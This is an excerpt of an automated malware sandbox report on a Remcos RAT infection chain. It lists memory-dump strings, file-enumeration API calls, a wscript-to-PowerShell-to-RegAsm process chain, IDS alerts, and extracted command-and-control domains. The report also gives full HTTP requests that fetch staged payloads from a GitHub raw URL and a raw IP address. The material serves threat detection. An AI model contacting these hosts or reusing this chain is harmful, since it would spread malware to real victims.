                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.pdb source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2387421374.0000000007890000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040928E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041C322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040C388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004096A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00408847
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407877 FindFirstFileW,FindNextFileW,11_2_00407877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044E8F9 FindFirstFileExA,11_2_0044E8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00419B86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040BD72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_10006580 FindFirstFileExA,11_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00407CD2

                      Software Vulnerabilities

                      barindex
                      Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49724 -> 192.169.69.26:9764
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49727 -> 192.3.101.153:9764
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49721 -> 192.169.69.26:9674
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49730 -> 192.3.101.153:9764
                      Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 107.175.229.138:80 -> 192.168.2.5:49715
                      Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 107.175.229.138:80 -> 192.168.2.5:49715
                      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 185.199.108.133:443 -> 192.168.2.5:49706
                      Source: Malware configuration extractorURLs: danbana.duckdns.org
                      Source: Malware configuration extractorURLs: danbana.duckdns.org
                      Source: Malware configuration extractorURLs: dantata.duckdns.org
                      Source: Malware configuration extractorURLs: dantata.duckdns.org
                      Source: unknownDNS query: name: dantata.duckdns.org
                      Source: unknownDNS query: name: danbana.duckdns.org
                      Source: global trafficHTTP traffic detected: GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /550/MNCCDR.txt HTTP/1.1Host: 107.175.229.138Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /550/MNCCDR.txt HTTP/1.1Host: 107.175.229.138Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                      Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
                      Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49731 -> 178.237.33.50:80
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49714
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49931
                      Source: global trafficHTTP traffic detected: GET /550/seethebestpicturewithgreatthingsinlinealways.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.175.229.138Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /550/seethebestpicturewithgreatthingsinlinealways.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.175.229.138Connection: Keep-Alive
